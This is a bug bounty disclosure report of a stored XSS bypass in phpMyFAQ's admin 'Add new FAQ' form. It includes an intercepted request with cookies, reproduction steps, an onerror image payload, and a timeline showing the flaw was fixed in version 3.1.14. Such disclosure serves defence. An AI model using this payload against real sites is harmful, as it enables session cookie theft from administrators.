Stored XSS bypass in "FAQ" in thorsten/phpmyfaq


Reported on

May 2nd 2023


Stored XSS in "Add new FAQ" feature via inject XSS payload in the answer at the following


1- Login as admin and Go to the following URL to add a new faq 2-Enter the "Question" and "Answer" values and intercept the request

POST /admin/?action=insertentry HTTP/2
Cookie: PHPSESSID=0d93a6d553659b592de5960477f2dcf3; phpmyfaq-setup=db7f78de80ee8152a536f2e90b38c1ff; cookieconsent_status=dismiss; pmf_sid=53
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 535
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers


3-Delete "answer" parameter html code and type any bypass payload <img only=1 src=x onerror=alert(1)> 4-Send the request and publish it to see the alert


So any co admin or support user can inject the payload and steal admin Cookies .

We are processing your report and will contact the thorsten/phpmyfaq team within 24 hours. 7 months ago
thorsten/phpmyfaq maintainer has acknowledged this report 7 months ago
Thorsten Rinne validated this vulnerability 7 months ago
Mohamed Abdelhady has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Thorsten Rinne marked this as fixed in 3.1.14 with commit 937913 7 months ago
Thorsten Rinne has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on May 31st 2023
Thorsten Rinne published this vulnerability 6 months ago
to join this conversation